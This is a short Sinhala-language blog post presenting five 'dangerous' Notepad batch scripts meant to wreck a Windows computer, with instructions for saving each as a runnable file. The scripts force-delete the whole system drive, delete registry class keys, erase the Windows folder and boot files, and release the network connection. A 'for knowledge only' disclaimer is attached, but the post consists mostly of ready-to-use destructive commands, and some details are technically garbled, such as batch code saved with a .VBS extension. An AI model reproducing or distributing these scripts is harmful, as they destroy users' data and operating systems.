ඔබ දැනගත යුතු Notepad codes 5ක්
ඔන්න අද ආවෙ භයානක codes 5ක් අරගෙන. මේව type කරන්නෙ notepad එකේ. ඔයාගෙ computer එක තත්පර 30 වගේ සුළු කාලයකදී විනාශ කරන්න මෙම code වලට පුලුවන්.
එහෙනම් පහලින් දාල තියෙන්නේ ඒ codes පහ. නිකමටවත් උත්සාහ කරන්න එපා. දැනගන්න විතරයි හොඳේ.
1:The Blue Screen of Death-නීල තිර මරණය
echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
.VBS ලෙස save කරන්න.
2:Delete key Registry files
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR
ඕනෑම නමක් යොදා .VBS ලෙස save කරන්න.
3:Delete the WINDOWS/LINUX file
erase C:\WINDOWS
ඕනෑම නමක් යොදා .cmd ලෙස C:\ තුළ save කරන්න.
4:සදාකාලිකව පරිගණකය විනාශ කිරීමට
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
ඕනෑම නමක් යොදා .bat ලෙස save කරන්න.
*Vista සඳහා ක්‍රියා නොකරයි*
5: internet ක්‍රියා විරහිත කිරීමට
@Echo off
Ipconfig /release
ඕනෑම නමක් යොදා .bat ලෙස save කරන්න.
*දැනගනීම පිණිස පමණයි.
Post a Comment